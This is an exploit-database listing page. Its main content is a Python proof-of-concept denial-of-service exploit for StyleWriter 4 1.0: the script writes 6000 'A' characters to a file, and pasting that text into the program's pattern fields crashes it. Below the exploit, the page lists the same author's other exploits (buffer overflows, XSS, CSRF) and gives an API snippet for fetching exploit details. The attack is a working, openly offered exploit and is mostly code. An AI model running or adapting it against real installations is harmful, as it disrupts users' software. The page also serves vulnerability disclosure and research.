Search for hundreds of thousands of exploits

"StyleWriter 4 1.0 - Denial of Service (PoC)"

Author

Exploit author

"Gionathan Reale"

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-08-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: StyleWriter 4 1.0 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-23
# Homepage: http://www.editorsoftware.com
# Software Link: http://www.editorsoftware.com/StyleWriter_Download.php
# Tested Version: 1.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. In the new window click "Tools" >"Add Pattern...". 
# Now in the new window paste the content of 
# "exploit.txt" into the following fields:"Pattern to Find" & "Advice Message". 
# Click "Add" and you will see a crash.

#!/usr/bin/python
   
buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
Release DateTitleTypePlatformAuthor
2019-03-21"Canarytokens 2019-03-01 - Detection Bypass"doswindows"Gionathan Reale"
2019-03-15"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities"webappsphp"Gionathan Reale"
2019-03-13"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting"webappsphp"Gionathan Reale"
2019-03-12"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)"webappsphp"Gionathan Reale"
2018-12-11"LanSpy 2.0.1.159 - Local Buffer Overflow (PoC)"doswindows"Gionathan Reale"
2018-12-09"Textpad 8.1.2 - Denial Of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-26"CrossFont 7.5 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-26"TransMac 12.2 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-25"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)"localwindows_x86"Gionathan Reale"
2018-09-17"XAMPP Control Panel 3.2.2 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-14"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-14"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)"localwindows_x86"Gionathan Reale"
2018-09-14"Faleemi Plus 1.0.2 - Denial of Service (PoC)"doswindows_x86-64"Gionathan Reale"
2018-09-13"Faleemi Desktop Software 1.8.2 - 'SavePath for ScreenShots' Buffer Overflow (SEH)"localwindows"Gionathan Reale"
2018-09-13"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)"localwindows_x86"Gionathan Reale"
2018-09-12"PicaJet FX 2.6.5 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-12"RoboImport 1.2.0.72 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-12"jiNa OCR Image to Text 1.0 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-12"PixGPS 1.1.8 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-12"PDF Explorer 1.5.66.2 - Denial of Service (PoC)"doswindows"Gionathan Reale"
2018-09-12"iCash 7.6.5 - Denial of Service (PoC)"doswindows"Gionathan Reale"
2018-09-12"Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC)"doswindows"Gionathan Reale"
2018-09-10"Zenmap (Nmap) 7.70 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-09-07"iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow (SEH)"localwindows_x86"Gionathan Reale"
2018-08-29"Easy PhotoResQ 1.0 - Denial Of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-08-29"HD Tune Pro 5.70 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-08-29"Fathom 2.4 - Denial Of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-08-29"Immunity Debugger 1.85 - Denial of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-08-29"Drive Power Manager 1.10 - Denial Of Service (PoC)"doswindows_x86"Gionathan Reale"
2018-08-23"StyleWriter 4 1.0 - Denial of Service (PoC)"localwindows_x86"Gionathan Reale"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45250/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.